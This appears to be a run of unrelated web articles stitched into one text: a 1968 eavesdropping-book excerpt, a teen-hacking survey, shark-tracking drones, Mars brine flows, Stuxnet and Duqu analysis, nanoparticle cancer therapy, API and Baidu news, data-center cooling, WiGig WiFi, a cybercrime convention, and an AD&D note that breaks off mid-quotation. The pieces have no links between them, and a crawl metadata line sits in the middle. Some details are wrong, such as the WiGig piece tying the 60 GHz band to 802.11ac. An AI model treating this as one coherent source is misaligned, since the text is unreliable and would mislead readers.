To illustrate this more fully, let us take the installation of a “bug” in the office of a subject. The eavesdropper might rent quarters nearby which would enable him to observe the comings and goings of the subject by the push of a button that could send a sonic, sub-sonic, cesium, infra-red or radio signal. This signal could be further sensitized by the possession of special tones or keying code signals; should someone attempt to do a search for the device, the eavesdropper would immediately hear the technician at work. By again pushing the control button, the eavesdropper could de-activate the unit or turn it off, leaving the searcher without a signal to follow.
In a case involving the conversion of a normal telephone into a live microphone, the eavesdropper supplies – from his remote listening post – the battery voltage necessary to make the microphone become alive. Again, should he hear someone attempting to make an inspection, he removes the battery voltage, and only a carefully trained searcher would know how to identify the telltale indications of the “hot” telephone mike.
In the more sophisticated micro-miniature microphones and amplifiers, battery voltage to activate the devices is also supplied from the listening end. Again, since the voltage can be removed should the eavesdropper sense the danger of discovery, the only indication remaining would be the device itself, and it would generally be concealed in such a way that a mere pinhole would be visible. If this kind of device were to be placed behind wood paneling that contained many nail holes, the mike-intake hole would appear no different than any of the other tiny perforations.
I demonstrated publicly the sensitivity of a microphone concealed within an ordinary duplex electrical wall outlet – the kind of outlet that might be found in any home or office in the United States. This ordinary-looking wall outlet, I explained, had only a sensitive microphone. There are other models in existence which, in addition to the microphone, have a built-in amplifier that can send a remotely controlled signal ten or more miles. Another model has a built-in miniature radio transmitter that takes its power from the power line and radiates its signal through the air. Still another model takes its power from the power line but does not radiate its signal through the air; instead, it sends back over the power lines a radio frequency that can be picked up anywhere in the same building or within the main power-line circuits feeding that building. By fancier manipulation yet, this signal can be made to go even greater distances by bypassing the power transformer on the block.
It was in 1955 that I made public a device which, once installed, would permit me to call a specific telephone number from anywhere in the United States, listen in on a telephone conversation if one were taking place and then, when the party hung up, continue to listen to conversations being held on the premises, all by long-distance remote control.
There are other sophisticated devices, unknown to the public and to law enforcement, which remain closely guarded secrets of the private investigator’s trade. Frightening as these devices are in their potential, we must face the fact that we are now entering an area of even greater technological development, one that staggers the imagination.
The technical know-how incorporated into these devices, is, in general, used for legitimate purposes in other fields. In recent years we have heard much about the laser beam. There are over two hundred companies engaged in laser research and development. The laser offers promising possibilities in the medical field since its ability to cut is so fine that a scalpel no larger than a pinpoint could not duplicate its delicate accuracy. There are harmful effects possible with the laser, too. Experiments have shown that the laser could be beamed through a closed window to take out the sound in the room. The only limiting factor to this feat at the present time is the size of the equipment required. As soon as miniaturization is achieved, such eavesdropping will be a simple matter. It is safe to predict that in the near future the laser beam will not only be used to take the sound out of a room, but will also be used to take out a visual image of whatever is going on within that room.
As I pointed out to the Legislative Committee in Boston, Massachusetts, there is not one state in the Union that has included in its eavesdropping laws the word “picture”. The statutes refer only to the overhearing of a spoken word. I recommended to the Committee that it include the idea of “picture”. As I explained, the new development known as video telephone, introduced by the telephone company at the New York World’s Fair in 1965, enables two parties to not only converse, but to also see each other on a TV screen at the same time. The telephone company proudly stated that this service would soon be expanded and made available to any subscriber who wanted it. I cautioned the Committee that, just as the ordinary telephone in the home can now be adapted into a live microphone, circuitry would enable the technician to jump the video phone in a way to make the video portion send out a continuous picture even when the phone was not in use. Frightening as this may seem, it does not compare with the possibilities that lie ahead.
from Chapter 18 - A Matter of Privacy - A final thought...
In this complicated modern world which has given us inter-continental ballistic missiles, satellite spies and atomic warheads, and which has reduced warfare to split-second, push-button decision-making, we have been forced to grant to our national leaders sweeping emergency powers that would have made our Founding Fathers shudder. We can accept all of this because it affects not only the survival of our country, but the future of the world.
In every other area, however, we must strengthen our individual freedom and our personal liberties. We have the money, the technical know-how and the man-power to keep ourselves free from external aggression. But advances in the technology of eavesdropping have made possible the total invasion of our privacy. We are in serious danger of destroying from within the very freedom we so earnestly seek to preserve. It will serve us well to remember that “where justice ends, tyranny begins.” *
Copyright © 1968 B.R. Fox
Library of Congress Catalog Card Number: 68-18702
* On the United States Department of Justice building in Washington DC, there are five words engraved in stone... "Wherever Law ends, Tyranny begins." John Locke, 1690
A survey by Trend Micro suggests that British teens might be tempted by illegal online methods to make money. One in three teens (aged 12 – 18) admitted they would consider hacking or spying on people online if it meant they could make some fast cash. The survey exposes lack of “e-morals” at a time where kids are spending a significant amount of their time online.
The survey, which polled 1,000 teens and parents across the UK, revealed that kids don’t appear to have any sense of netiquette when it comes to their online behavior. It found:
- Over one in 10 teens thought it was “cool” or “funny” to pretend to be someone else online
- One in seven 12 to 13 year olds have actually done this
- Over four out of ten teens have hacked into another person’s profile to read emails, looked at bank account details, or logged onto another person’s social networking profile
- One in three teens have admitted to being tempted to try hacking or spying on the internet to make money
- Boys, it would seem, were almost twice as likely as girls to log into someone’s social networking site
- Girls were up to three times more likely than boys to enter into someone’s online shop or bank accounts without the owner knowing.
Tips for protecting your kids online
- Keep all computers in common areas.
- Agree to time limits for using the Internet and all social devices.
- Keep software security up-to-date.
- Talk with your kids about entering personal information online.
- Run a manual scan with your software security and check browser history.
- Set profiles on social networking sites to private.
- Encourage children to be respectful of others.
- Teach children to have multiple passwords that are NOT associated with names, nicknames or commonly found information over the net.
- Most importantly, keep informed about the latest outbreaks and dangers on the Internet. | <urn:uuid:a93fe59b-c175-48be-8da3-b8974a95bc60> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2009/04/03/survey-shows-teens-would-spy-on-people-online-for-money/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00356-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9432 | 406 | 2.9375 | 3 |
Imagine floating on the empty blue Pacific Ocean, nothing but water in every direction, sunrise to sunset. Yet under the surface swim thousands of great white sharks.
That's not a bad dream - it's actually what happens around this time of year several thousand miles off the coast of Baja California, about halfway to Hawaii. The king predators congregate in a huge area of the ocean nicknamed the White Shark Cafe.
But why the big sharks favor this remote spot remains a mystery. The area is sometimes called "the desert of the ocean," and Sal Jorgensen, a research scientist at the Monterey Bay Aquarium, says there is little observable life to sustain a food chain. While there, the sharks assume bizarre behavior, sometimes diving thousands of feet at intervals as short as 10 minutes.
Scientists believe the white sharks congregate to find food and to find a mate, hence the idea of a "cafe" - but only better research can determine whether the shark gathering is more "restaurant" or "motel."
"We know very little," Jorgensen said, joking that it seems like Burning Man for white sharks.
A lack of sensory equipment makes it hard for researchers to find out what's happening below the surface of the water. Most data for studying sharks, or any ocean phenomenon, are gathered by buoys (which are immobile), satellites (which are inexact, usually confined to surface measurements and not always in range) or scientists on ships (which are expensive and time-consuming).
This is where drones come in.
Autonomous craft are reshaping the way scientists study the ocean, and two Bay Area companies, Liquid Robotics and upstart Saildrone, funded by the Marine Science and Technology Foundation (founded by Google Chairman Eric Schmidt), have been making waves with their unmanned gliders and sailboats. Saildrone recently completed a voyage around Hawaii and back to the Bay Area with its autonomous sailboats. But now the group must prove its crafts can do more than simply get from point A to point B - like gather critical ocean data.
"The next stage is to demonstrate that we can do real, valuable science," said Saildrone lead researcher Richard Jenkins.
The startup, which has a workshop in a hangar on Alameda's old Navy base, attaches shark sensors to its craft's keel. Getting sensors under the surface is key. As the drone passes within range of the shark, the sensor picks up its acoustic tag and beams the data back to mission control. Without the drone, researchers have to wait until the tag pops off (usually about a year) and then retrieve it via ship, which can cost tens of thousands of dollars per day. Then researchers must assemble the animal's activities retroactively.
The hope is that with drones periodically transmitting data as they traverse the White Shark Cafe, or any other area of interest, observations occur in real time - and at far less expense. Jorgensen and Stanford marine biologist Barbara Block, who is working with Liquid Robotics and Saildrone, hope for better data, such as the animal's exact positions in the water column at certain moments, giving them a 3-D perspective. This indicates whether (and what) the sharks are hunting, potentially helping scientists understand the purpose of the Cafe, not to mention other migratory and feeding habits. Block hopes for similar discoveries with bluefin tuna and other pelagic fish, which inhabit the open ocean away from shore and sea floor.
"You'd think we know, but we don't," she said. "It's a very inaccessible world."
The Stanford group has tried to open some of that world to the public with the Shark Net app for iPhones, which lets anyone monitor and see pictures of tagged fish, but continuous information is tricky. "This is a great concept, but the data is not up-to-date," notes a top comment in the iTunes Store. "Would be a great app if it was kept current."
Keeping information current is only one challenge. Saildrone must also make sure its instrumentation remains accurate in the brutal marine environment, where heat and cold can warp calibration. Jenkins and Co. are working with the National Oceanic and Atmospheric Administration to fine-tune the sensors. Even a slight deviation can make an entire data set meaningless.
"Just because you collect a number, doesn't mean it's right," Jenkins said.
Florida State University oceanographer Ian MacDonald hopes the drones will provide data to better predict tropical storms. Satellites, he says, can only measure surface temperatures - but temperature below the surface is vital for researchers.
"Anything that will give us a better handle would be very important," he said.
And drones could also map areas previously tricky for ships. Saildrone's craft cut only 6 feet under the water, so they can navigate shallow areas - meaning they could take far more nuanced pictures of the ocean floor and save on fuel compared with the boats currently performing the task.
The drones cost almost nothing to operate and are relatively simple to control and monitor. Provide destination coordinates, and off they go - the command software is simple enough to run in a Web browser, and Jenkins occasionally monitors the craft from his iPhone (via a private website). The vessels have small solar panels to power the onboard computers and sensors, but the drones move completely on wind power.
But the drones can't stay at sea forever. Despite protective paint and a streamlined design, algae and other sea life will eventually coat the craft and slow it down, meaning it has to come back to shore for cleaning and a tune-up.
The drone's hull is shaped something like a big pelagic fish, but Jenkins says sharks haven't mistaken it for prey yet. In fact, when they've sailed near marine life, the animals don't make much fuss. Crafts with engines usually have them scrambling to get away. Because the drones are silent, Jenkins believes animals don't pay much mind, viewing them as pieces of fast-moving driftwood.
This sort of detailed insight into the lives of sharks presents something of a double-edged sword. Researchers need to publish data so activists and governments know where to establish marine conservation zones. But that data also inform fishermen, many of whom disregard catch limits on threatened species or even brutalize animals by slicing off shark fins for soup and leaving them to die.
"We're always faced with this dilemma," said Jorgensen.
Yet, to add one more bullet to the list of tasks these machines could perform, Jenkins has worked with government agencies to test drones for patrolling protected fisheries and taking pictures of boats violating the rules. Those discussions are also in very early stages.
Drones haven't proven to be a panacea for answering marine science questions quite yet. But Block is hopeful.
"These are the modern-generation tools to study the ocean," she said.
©2014 the San Francisco Chronicle
Could some sort of briny water be flowing on Mars during its warm season? Seems that may be the case, as NASA today said its red planet-orbiting satellite spotted possible flowing water, furthering the idea that Mars once harbored or still harbors life.
The results from NASA's Mars Reconnaissance Orbiter are the closest scientists have come to finding evidence of liquid water on the planet's surface, NASA said. Frozen water, however, has been detected near the surface in many middle- to high-latitude regions.
NASA today said: "Dark, finger-like features appear and extend down some Martian slopes during late spring through summer, fade in winter, and return during the next spring. Repeated observations have tracked the seasonal changes in these recurring features on several steep slopes in the middle latitudes of Mars' southern hemisphere. Some aspects of the observations still puzzle researchers, but flows of liquid brine fit the features' characteristics better than alternate hypotheses. Saltiness lowers the freezing temperature of water. Sites with active flows get warm enough, even in the shallow subsurface, to sustain liquid water that is about as salty as Earth's oceans, while pure water would freeze at the observed temperatures."
NASA went on to say images show flows are only about 0.5 to 5 yards or meters wide, with lengths up to hundreds of yards. The width is much narrower than previously reported gullies on Martian slopes. However, some of those locations display more than 1,000 individual flows. Also, while gullies are abundant on cold, pole-facing slopes, these dark flows are on warmer, equator-facing slopes.
"The best explanation for these observations so far is the flow of briny water," said Alfred McEwen of the University of Arizona, Tucson in a statement. McEwen is the principal investigator for the orbiter's High Resolution Imaging Science Experiment (HiRISE) and lead author of a report about the recurring flows published in Thursday's edition of the journal Science.
Follow Michael Cooney on Twitter: nwwlayer8
In June 2010, the world became aware of Stuxnet, largely considered to be the most advanced and dangerous piece of malware ever created. But before you run to check that your antivirus software is up to date, note that Stuxnet, largely believed to be state-created, was created with one singular purpose in mind - to cripple Iran's ability to develop nuclear weapons.
When security researchers began studying Stuxnet more closely, they were astonished at its level of sophistication. Stuxnet's ultimate aim, researchers found, was to target specialized Siemens industrial software and equipment employed in Iran's nuclear research facilities. The original Stuxnet virus was able to deftly inject code into the Programmable Logic Controllers (PLCs) of the aforementioned Siemens industrial control systems.
The end result, according to foreign reports, is that Stuxnet was able to infiltrate an Iranian uranium enrichment facility and subsequently destroy over 1,000 centrifuges, albeit in a manner subtle enough to avoid detection by Iranian nuclear scientists.
In the wake of Stuxnet, researchers weren't shy about proclaiming that a new era of sophisticated malware was upon us.
This past September, a new variant of Stuxnet was discovered. It's called Duqu and security experts believe it was developed in conjunction with Stuxnet by the same development team. After studying the software, security firm Symantec said that the Duqu virus was almost identical to Stuxnet, yet with a "completely different purpose."
The reported goal of the Duqu virus wasn't to sabotage but rather to acquire information.
A research report from Symantec this past October explained,
Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created since the last Stuxnet file was recovered. Duqu's purpose is to gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party. The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility.
And just when you thought the whole Stuxnet/Duqu trojan saga couldn't get any crazier, a security firm that has been analyzing Duqu writes that it employs a programming language they've never seen before.
Security researchers at Kaspersky Lab found that the "payload DLL" of Duqu contains code from an unrecognizable programming language. While many parts of the Trojan are written in C++, other portions contain syntax that security researchers can't pin back to a recognizable programming language.
After analyzing the code, researchers at Kaspersky were able to conclude the following:
- The Duqu Framework appears to have been written in an unknown programming language.
- Unlike the rest of the Duqu body, it's not C++ and it's not compiled with Microsoft's Visual C++ 2008.
- The highly event driven architecture points to code which was designed to be used in pretty much any kind of conditions, including asynchronous commutations.
- Given the size of the Duqu project, it is possible that another team was responsible for the framework than the team which created the drivers and wrote the system infection and exploits.
- The mysterious programming language is definitively NOT C++, Objective C, Java, Python, Ada, Lua and many other languages we have checked.
- Compared to Stuxnet (entirely written in MSVC++), this is one of the defining particularities of the Duqu framework.
Consequently, Kaspersky decided to reach out to the programming community to help them figure out which programming language the Duqu Framework employs. As of Sunday evening, nothing conclusive has been found, but a comment on Kaspersky's blog post might prove useful.
The code your referring to .. the unknown c++ looks like the older IBM compilers found in OS400 SYS38 and the oldest sys36.The C++ code was used to write the tcp/ip stack for the operating system and all of the communications. The protocols used were the following x.21(async) all modes, Sync SDLC, x.25 Vbiss5 10 15 and 25. CICS. RSR232. This was a very small and powerful communications framework. The IBM system 36 had only 300MB hard drive and one megabyte of memory,the operating system came on diskettes.This would be very useful in this virus. It can track and monitor all types of communications. It can connect to everything and anything.
While many other suggestions via the comment section were dismissed by Kaspersky Lab expert Igor Soumenkov, the one above netted a "Thank you!"
Another tip that Soumenkov seemed excited about identifies the unknown language as Simple Object Orientation (for C), but not without some reservations.
SOO may be the correct answer! But there are still two things to figure out:
1) When was SOO C created? I see Oct 2010 in git - that's too late, Duqu was already out there.
2) If SOO is the toolkit, then event driven model was created by the authors of Duqu. Given the size of framework-based code, they should have spent 1+ year making all things work correctly.
...It turns out that almost the same code can be produced by the MSVC compiler for a "hand-made" C class. This means that a custom OO C framework is the most probable answer to our question.
We kept this (OO C) version as a "worst-case" explanation - because that would mean that the amout of time and effort invested in development of the Framework is enormous compared to other languages/toolkits.
Note that work on Duqu, according to researchers, began sometime in 2007. And as for the enormous amount of work Soumenkov refers to, remember that most researchers believe Stuxnet and its brethren were created by state actors. Many believe Israel and the United States may have worked together on the project to stymie Iran's nuclear weapons plans. Others believe Stuxnet may be the handiwork of China.
Oh yes, that’s a real thing even if YOUR browser thinks “affective” is not a word and shames it with a red squiggly. Affective forecasting is the act of predicting an emotional reaction to some hypothetical future event. We use it frequently. Have you ever filled out a survey that asked you how likely you would be to refer a friend to some company? That’s affective forecasting.
Affective forecasting has great uses, but it has serious drawbacks. In my research on the Consumer’s Attitudes Toward Breaches, we learned that nearly every survey related to the study of breached merchants was flawed. In fact, when you ask someone how they will react to a hypothetical event, societal norms will kick in that could cause them to give a false answer. Here’s a real-world example that happened over the weekend.
My niece is now in high school—which is terrifying enough in its own right—and the peer pressure is mounting. Her mother was talking about a real-world scenario in which someone in an authoritative position would request her to do something like ride in a parent's personal vehicle for a school-sponsored event. Now, with the manner in which she asked, of course my niece would respond with "no." But would she actually get in that vehicle when the situation goes from hypothetical to real? We'll have to wait and see.
Ultimately, I speculate that external pressures and the fact that someone is observing the answer will cause people to answer the way they think they are supposed to, as opposed to accurately forecasting their behavior. It's important for researchers (academics or practitioners) to realize that they may be introducing bias when affective forecasting is used in the response.
In a second report this week on scientists' use of nanotechnology to battle cancer, researchers at MIT announced a new way to use nanoparticles to give cancerous cells a one-two punch.
MIT reported that researchers used nanoparticles to carry two drugs and release them one at a time. The treatment was shown to "dramatically shrink" lung and breast tumors in mice.
"I think it's a harbinger of what nanomedicine can do for us in the future," said Paula Hammond, an MIT professor of engineering, in a statement. "We're moving from the simplest model of the nanoparticle -- just getting the drug in there and targeting it -- to having smart nanoparticles that deliver drug combinations in the way that you need to really attack the tumor."
The university explained that first the nanoparticles disarm the cancer cell's defenses by releasing a drug called Erlotinib, also known as Tarceva, which shuts down one of the pathways that promote uncontrolled tumor growth. Then the nanoparticles release another drug called Doxorubicin, also known as Adriamycin.
Once weakened by the administering of the Erlotinib, the cancer cells are more susceptible to being treated with the second drug.
"It's like rewiring a circuit," said Michael Yaffe, an MIT professor. "When you give the first drug, the wires' connections get switched around so that the second drug works in a much more effective way."
Scientists have known that treating cancer patients with the prolonged attack of two or more drugs can bring greater success than using one medication. In more recent years, they've also determined that the specific timing of the drug delivery has a significant effect on the outcome.
According to MIT, using Erlotinib and Doxorubicin in a specifically timed succession proved a powerful tool to beat back a specific type of breast cancer known as triple-negative tumors, an aggressive cancer that tends to strike young women.
To deliver these drugs, the scientists turned to nanotechnology.
The researchers designed the nanoparticle so that the Erlotinib is embedded in the outer layer of it, while Doxorubicin is inside the particle's core. The particles are coated with a polymer, protecting them from breaking down in the body or being filtered out by the liver and kidneys.
Once the particles reach the tumor, they work their way inside the cancerous cells and begin to break down. Since the Erlotinib is in an outer layer of the particles, it is released first. By the time the second drug is released, the first drug has had enough time to weaken the cancer's defenses.
"There's a lag of somewhere between four and 24 hours between when Erlotinib peaks in its effectiveness and the doxorubicin peaks in its effectiveness," said Yaffe.
The treatment has been tested on triple-negative breast tumors, along with non-small-cell lung tumors. Both types of cancers were shrunk significantly, according to MIT.
Earlier this week, researchers at Johns Hopkins University reported that they have used nanoparticles as Trojan horses that deliver "death genes" to kill brain cancer cells beyond the reach of surgeons.
This particular nano-based treatment, which focused on glioblastomas, the most lethal and aggressive form of brain cancer, uses biodegradable nanoparticles that deliver genes that induce death in cancer cells but don't affect healthy cells.
The Johns Hopkins treatment has been tested on mice but not on humans.
This article, MIT uses nanotech to hit cancer with one-two punch, was originally published at Computerworld.com.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin or on Google+.
APIs have been making the news lately, especially with Apple's release of the Metal API for iOS. But APIs themselves have been around for a long time. They're a necessity in today's ever-changing tech landscape, which is why understanding them is key to providing users with the interoperability they now require.
What is an API?
An API (short for “Application Programming Interface”) is a set of requirements that determine how one application can talk to another.
Why do APIs matter?
The short answer: APIs help make your life easier by making things more efficient. Say you have an application that checks the weather forecast for rain and, if there’s a chance of rain, it’ll display an umbrella icon on your home screen. The app does this by pulling the day’s forecast from weather.com.
Here’s the difference an API would make in our example app:
Without an API:
The app checks the current weekly forecast by opening http://www.weather.com/ and reading the webpage much like a human user would, interpreting the content as it goes. The app knows to look for the weekly forecast in one specific area of the site. However, if the site changes its layout, the app won’t work anymore.
With an API:
The app will call the message listed in weather.com’s API that returns the weekly forecast. Regardless of what the website looks like, the app will get the data it needs and will function as it should.
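The "with an API" path can be sketched in a few lines of Python. The payload shape and the field names (`daily`, `rain_probability`) are invented for illustration; a real weather API documents its own response schema.

```python
import json

def should_show_umbrella(api_response: str, threshold: float = 0.3) -> bool:
    """Decide whether to display the umbrella icon from a structured API reply."""
    forecast = json.loads(api_response)  # structured data, not a scraped webpage
    return any(day["rain_probability"] >= threshold for day in forecast["daily"])

# Simulated API payload; a real app would fetch this over HTTP.
payload = '{"daily": [{"day": "Mon", "rain_probability": 0.1}, {"day": "Tue", "rain_probability": 0.6}]}'
print(should_show_umbrella(payload))  # True -- Tuesday looks rainy
```

Because the app reads named fields rather than scraping the page layout, a site redesign no longer breaks it.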
As you can see, APIs not only make interoperability possible, but offer a host of other benefits like improving functionality and streamlining processes.
How APIs work
APIs themselves are a series of different XML messages, each XML message corresponding to a different function. For example, a cloud hosting API may have an XML message that corresponds with creating a cloud server and one that will reboot a cloud server.
To tap into this functionality, a developer will write code that generates the right XML messages to either create or reboot a server and voila! The servers will be created or rebooted in real time, all without needing to log into a portal.
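As a sketch of those XML messages, the snippet below composes the kind of request such an API might accept. The `request` and `server` element names are hypothetical; each provider documents its own message format.

```python
import xml.etree.ElementTree as ET

def build_request(action: str, server_id: str) -> str:
    """Compose one XML API message, e.g. to create or reboot a cloud server."""
    root = ET.Element("request", {"action": action})
    ET.SubElement(root, "server", {"id": server_id})
    return ET.tostring(root, encoding="unicode")

msg = build_request("reboot", "srv-42")
print(msg)  # <request action="reboot"><server id="srv-42" /></request>
```

A create call and a reboot call would differ only in the `action` attribute and whatever parameters that provider's schema requires.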
Advantages of using an API
Part of the reason releasing APIs has become so popular is how much they benefit users. Some of the main benefits are:
- Easy integration. With an API available, developers can easily integrate other services into their existing software.
- Processes are streamlined. Back to our cloud hosting example, developers could integrate cloud hosting functionality into existing applications so companies wouldn’t need to train IT staff and employees on how to administer and use new software.
- It empowers users. APIs enable users to better access and customize a service in a way that suits their needs directly.
Thus, companies who release APIs allow their customers to access their services in newer, more efficient ways. If you're interested in learning more about APIs and what they can do for you from a cloud perspective, check out our API here. We'd love to get your feedback on it, and know how you're using it to power your business.
Baidu, China's leading search engine, is making available Chinese language APIs for its four key speech technologies: Long Utterance Speech Recognition, Far-Field Speech Recognition, Expressive Speech Synthesis and Wake Word.
Baidu said its intent is to provide developers with access to its AI-based technologies. Baidu has also released APIs for facial recognition, optical character recognition, natural language processing and others. In September, the company also open-sourced its deep learning framework PaddlePaddle, an easy-to-use platform allowing developers to apply deep learning to their products and services.
"We are at the dawn of the AI era. By opening our AI technologies, we will make it easier for everyone to create AI-enabled applications," says Andrew Ng, chief scientist of Baidu.
In just three years, the daily requests for speech recognition grew from 5 million in 2013 to 140 million this year, and the number of daily requests for speech synthesis stands today at 200 million. In the meantime, the number of developers using Baidu's speech system has also grown from 10,000 in 2014 to 140,000 this year.
Cooling Data Center Costs
By Samuel Greengard | Posted 2010-08-13
Roughly 40 percent of the energy consumed in data centers is a result of cooling systems, and that figure is rising. Reversing that trend is possible, and could mean big savings.
One of the hottest opportunities for greening the data center lies in cooling.
According to Booz & Co., roughly 40 percent of the energy consumed in data centers is a result of cooling systems, and that figure is rising. Here’s what Booz recommends to increase cooling efficiency:
• Optimize airflow in the data center to reduce the mean gradient temperature and reduce cooling requirements.
• Use a hot/cold aisle configuration, in which equipment racks are arranged in alternating rows of hot and cold aisles.
• Rely on air handlers to better control airflow within the data center and enable more efficient cooling.
• Deploy smart cooling energy-management systems with sensors to reduce energy consumption by as much as 40 percent.
• Increase cooling temperature targets to slightly above the data center baseline temperature. Every added degree results in an estimated 4 percent reduction in energy consumption.
• Install renewable cooling sources such as outside air during the winter—where practicable—to minimize usage of internal cooling systems.
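A quick sanity check of the temperature-target rule of thumb above, assuming the estimated 4 percent saving compounds per degree (my reading of the guidance, not necessarily Booz's exact model):

```python
def cooling_energy_fraction(degrees_raised: int, saving_per_degree: float = 0.04) -> float:
    """Fraction of baseline cooling energy remaining after raising the setpoint."""
    return (1.0 - saving_per_degree) ** degrees_raised

# Raising the cooling target 3 degrees leaves ~88.5% of baseline energy use,
# i.e. roughly an 11.5% saving on the cooling bill.
print(round(cooling_energy_fraction(3), 3))  # 0.885
```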
High-wireless act: Can high-frequency WiFi be practical?
- By Greg Crowe
- Oct 16, 2012
This article has been updated to correct an inaccurate reference to the 60 GHz band as 60 MHz.
As agencies continue to build out wireless networks and extend the use of mobile devices, a new spectrum specification, which will add a lot of speed and capacity, could become a key factor in how well those networks function.
In a recent article explaining the wireless spectrum allocation situation, we touched on the 60 GHz band that the Wireless Gigabit Alliance (WiGig) proposes to use for the next generation of wireless networking, IEEE 802.11ac.
But although the bandwidths are quite roomy up there in the 60 GHz band — more than 50 times as wide as in the current Institute of Electrical and Electronics Engineers (IEEE) 802.11n specification, enough to allow streaming of uncompressed video — there is an innate hurdle to working with higher frequencies: signal propagation loss over distance.
Since the air is made up of randomly-arranged molecules of matter, any waveform signal sent through them has a chance of being bounced off of whatever it runs into. Higher-frequency waves are more susceptible to signal loss than lower-frequency ones because of this.
A good example exists in everyday nature. Light on the blue end of the visible spectrum has a higher frequency than on the red end. When the sun’s light hits the atmosphere, the blue light scatters more, so the sky looks blue. When the sun is low on the horizon, its light has to go through even more atmosphere to reach you, making the sun look more reddish. So now if your kids ask why the sky is blue, you’ll know what to tell them.
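The scale of that loss can be sketched with the standard free-space path-loss formula, an idealized model that ignores obstacles and the oxygen absorption that further penalizes 60 GHz. Loss grows with the square of frequency, so the 12x jump from 5 GHz to 60 GHz costs the same number of decibels at any distance:

```python
import math

def fspl_db(distance_m: float, freq_hz: float) -> float:
    """Free-space path loss in dB: 20*log10(4*pi*d*f/c)."""
    c = 299_792_458.0  # speed of light, m/s
    return 20 * math.log10(4 * math.pi * distance_m * freq_hz / c)

penalty = fspl_db(10, 60e9) - fspl_db(10, 5e9)
print(round(penalty, 1))  # 21.6 dB extra loss at 60 GHz, independent of distance
```

That missing 21.6 dB is the link budget that beamforming and antenna arrays have to win back.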
WiGig proposes several ways to combat this innate problem. For one, the alliance is continuing to refine the multiple-input multiple-output (MIMO) antenna configuration that was first implemented in 802.11n. With MIMO, several antennae are all talking to each other to determine the best path to the other station. The 802.11ac standard doubled the MIMO streams used in ‘n’ from 4 to 8, so what WiGig is working on will likely have at least that many.
But the area that will likely have the greatest impact on the practical range of WiGig-designed devices is in the precoding stage of the MIMO process. This is when the device will use what is called “beamforming” to focus the signal. This process, an example of which is illustrated in the accompanying graphic by Stephane Dedieu, uses the multiple antennae to combine into a phased array. The signal produced will experience constructive interference in one direction and destructive in other directions.
So the signal will go farther in the desired direction. This type of transmission is also sometimes called "unidirectional," meaning that a signal with beamforming will go much farther than it would without it. How far will depend upon the technological improvements that happen between now and when WiGig and the IEEE come out with the new specification based on WiGig's current research.
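A toy model of that phased-array effect: treat each element's signal as a complex phasor and pick per-element phase weights so the phasors add coherently in the steered direction. The 8-element, half-wavelength-spaced line array here is illustrative only, not WiGig's actual antenna design.

```python
import cmath, math

def array_gain_db(n: int, spacing_wl: float, steer_deg: float, look_deg: float) -> float:
    """Gain of an n-element uniform linear array, relative to a single antenna."""
    total = 0j
    for i in range(n):
        # Geometric phase of element i toward the look direction...
        geom = 2 * math.pi * spacing_wl * i * math.sin(math.radians(look_deg))
        # ...plus the beamforming weight that steers the beam toward steer_deg.
        weight = -2 * math.pi * spacing_wl * i * math.sin(math.radians(steer_deg))
        total += cmath.exp(1j * (geom + weight))
    return 20 * math.log10(abs(total))

print(round(array_gain_db(8, 0.5, steer_deg=30, look_deg=30), 1))   # 18.1 dB on the beam
print(round(array_gain_db(8, 0.5, steer_deg=30, look_deg=-20), 1))  # far weaker off the beam
```

Eight elements summing in phase give 8x the single-antenna amplitude, a 64x (18 dB) power gain in the chosen direction and much less everywhere else.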
Greg Crowe is a former GCN staff writer who covered mobile technology.
- By Bruce McConnell
- Nov 12, 2000
International cybercrime — attacks on mission-critical government or private
computers from across national boundaries — is an increasing threat. Can
Self-protection through strong secur-ity tools and practices remains
the principal defense. Ultimately, however, governments must address the
investigation of cybercrimes and the prosecution of criminals. Most countries
recognize the need to update their laws to fight crimes committed in cyberspace.
But countries today mostly are in the same boat that the Philippines was
in after the "love bug" struck in May — they have no effective legal tools
to prosecute cybercriminals. As with many issues, it often takes a crisis
to precipitate action. In June, the Philippines outlawed most computer crimes
as part of a comprehensive e-commerce statute.
To prosecute crimes across national borders, an act must be a crime
in both jurisdictions. Thus, though local legal traditions must be respected,
nations must define cybercrimes similarly. One approach to encourage such
harmony is to develop a model law that can be adapted to local conditions.
Such an effort is underway in the Council of Europe (COE).
The COE, Europe's oldest political organization, has created model laws
and treaties covering human rights, education and the environment. Its Draft
Convention on Cyber Crime was crafted by law enforcement officials from
Europe, the United States and Japan.
The convention will address a range of cybercrimes, including illegal
access, illegal interception, data interference, system interference, computer-related
forgery, computer-related fraud, and the aiding and abetting of these crimes.
It also tackles investigational matters related to jurisdiction, extradition,
the interception of communications, and the production and preservation
of data. And it sets minimum standards for penalties.
As with most cybersecurity initiatives, the COE's framework is controversial.
The computer industry argues that it had little meaningful input in the
draft convention. The COE accepts comments on its draft, then releases a
revision. The latest version is at www.coe.int.
Industry believes requiring service providers to monitor communications
and provide assistance to investigators would be burdensome and costly.
It also objects to a provision criminalizing the use of hacking programs,
which may have been designed for legitimate security testing purposes.
The Global Internet Liberty Campaign (www.gilc.org) has joined the opposition,
objecting to a lack of procedural safeguards and due process to protect
individuals' rights. It believes ensuing national laws might place restrictions
on privacy, anonymity and encryption.
The council wants to finish its work by the end of the year, after which
member nations and others could sign on to the convention and implement
the provisions in their own laws. In the meantime, government and industry
should engage the COE process at all levels to ensure a workable outcome.
McConnell, former chief of information policy and technology at the Office
of Management and Budget, is president of McConnell International LLC (www.
In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)
Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester (Humphrey, the Lord Protector) defends his treatment of certain subjects, with two notable exceptions:
Unless it were a bloody murderer,
Or foul felonious thief that fleec’d poor passengers,
